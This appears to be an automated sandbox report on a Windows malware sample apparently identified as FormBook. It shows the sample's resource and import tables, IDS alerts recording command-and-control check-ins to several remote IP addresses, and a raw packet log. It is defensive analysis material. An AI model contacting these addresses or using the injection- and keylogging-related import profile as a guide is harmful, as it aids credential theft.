RT_STRING | 0xdc2b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc410 | 0xaf308 | data | | | 1.0003149492179226
RT_GROUP_ICON | 0x18b718 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x18b790 | 0x14 | data | English | Great Britain | 1.15
RT_VERSION | 0x18b7a4 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x18b880 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-01T19:43:05.133750+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.4 | 49730 | TCP
2024-11-01T19:43:44.039474+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.4 | 49736 | TCP
2024-11-01T19:44:02.875031+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49822 | 188.114.96.3 | 80 | TCP
2024-11-01T19:44:05.578168+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49836 | 188.114.96.3 | 80 | TCP
2024-11-01T19:44:08.172209+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49853 | 188.114.96.3 | 80 | TCP
2024-11-01T19:44:16.407692+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49900 | 3.33.130.190 | 80 | TCP
2024-11-01T19:44:18.981201+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49916 | 3.33.130.190 | 80 | TCP
2024-11-01T19:44:21.525519+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49932 | 3.33.130.190 | 80 | TCP
2024-11-01T19:44:30.546887+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49981 | 154.23.184.95 | 80 | TCP
2024-11-01T19:44:33.109508+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49996 | 154.23.184.95 | 80 | TCP
2024-11-01T19:44:35.609511+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50011 | 154.23.184.95 | 80 | TCP
2024-11-01T19:44:44.513285+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50016 | 172.67.185.22 | 80 | TCP
2024-11-01T19:44:47.090485+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50017 | 172.67.185.22 | 80 | TCP
2024-11-01T19:44:49.639229+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50018 | 172.67.185.22 | 80 | TCP
2024-11-01T19:44:58.423225+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50020 | 206.119.82.172 | 80 | TCP
2024-11-01T19:45:00.987680+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50021 | 206.119.82.172 | 80 | TCP
2024-11-01T19:45:03.578156+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50022 | 206.119.82.172 | 80 | TCP
2024-11-01T19:45:21.875133+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50024 | 103.191.208.137 | 80 | TCP
2024-11-01T19:45:24.423787+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50025 | 103.191.208.137 | 80 | TCP
2024-11-01T19:45:26.984652+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50026 | 103.191.208.137 | 80 | TCP
2024-11-01T19:45:36.437601+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50028 | 3.111.160.216 | 80 | TCP
2024-11-01T19:45:38.984458+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50029 | 3.111.160.216 | 80 | TCP
2024-11-01T19:45:41.671964+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50030 | 3.111.160.216 | 80 | TCP
2024-11-01T19:45:50.047522+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50032 | 203.161.49.193 | 80 | TCP
2024-11-01T19:45:52.949936+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50033 | 203.161.49.193 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 1, 2024 19:43:45.159183979 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.164201975 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.164287090 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.170517921 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.175337076 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.850938082 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.851000071 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.851082087 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.851093054 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.851103067 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.851174116 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.851255894 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.851265907 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.851277113 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.851351023 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.851414919 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.851468086 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.851475954 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.851658106 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.851720095 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.856249094 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.856261969 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.856272936 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.856287003 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.856339931 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.856401920 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.883326054 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.883342981 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.883481979 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.973846912 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.973915100 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.973926067 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.973937035 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.973948956 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.973978043 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.974042892 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.974138975 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.974148989 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.974217892 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.974380970 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.974391937 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.974402905 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.974416971 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.974442005 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.974442005 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.974911928 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.974922895 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.974929094 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.974937916 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.974951029 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.974970102 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.975004911 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.975004911 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.975565910 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.975585938 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.975596905 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.975636959 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:45.975672007 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.975682020 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:45.975723028 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:46.006005049 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.006062031 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.006072044 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.006114006 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:46.006153107 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:46.006223917 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.006234884 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.006242990 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.006339073 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:46.046838999 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:46.096213102 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.096298933 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.096307993 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.096317053 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.096334934 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.096352100 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.096364975 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.096375942 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.096385956 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.096396923 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.096399069 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:46.096440077 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:46.096440077 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:46.097115040 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.097126007 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.097135067 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.097184896 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:46.097266912 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.097278118 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.097290039 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.097300053 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.097317934 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:46.097351074 CET | 49738 | 80 | 192.168.2.4 | 38.47.237.27
Nov 1, 2024 19:43:46.097769976 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.097779989 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.097790956 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
Nov 1, 2024 19:43:46.097803116 CET | 80 | 49738 | 38.47.237.27 | 192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097815037 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097825050 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.097826004 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097840071 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097850084 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.097851992 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.097852945 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.097876072 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.098442078 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098500967 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.098556042 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098567009 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098576069 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098587036 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098598957 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098608971 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.098609924 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098623037 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.098649025 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.098680019 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.099543095 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099554062 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099565029 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099576950 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099587917 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099591970 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.099598885 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099611044 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099613905 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.099622965 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.099636078 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.099666119 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.100244999 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.100295067 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.128068924 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128079891 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128091097 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128096104 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128099918 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128146887 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128170967 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128180027 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.128256083 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.128293037 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.179018974 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.179037094 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.179042101 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.179203033 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.219243050 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219254017 CET804973838.47.237.27192.168.2.4
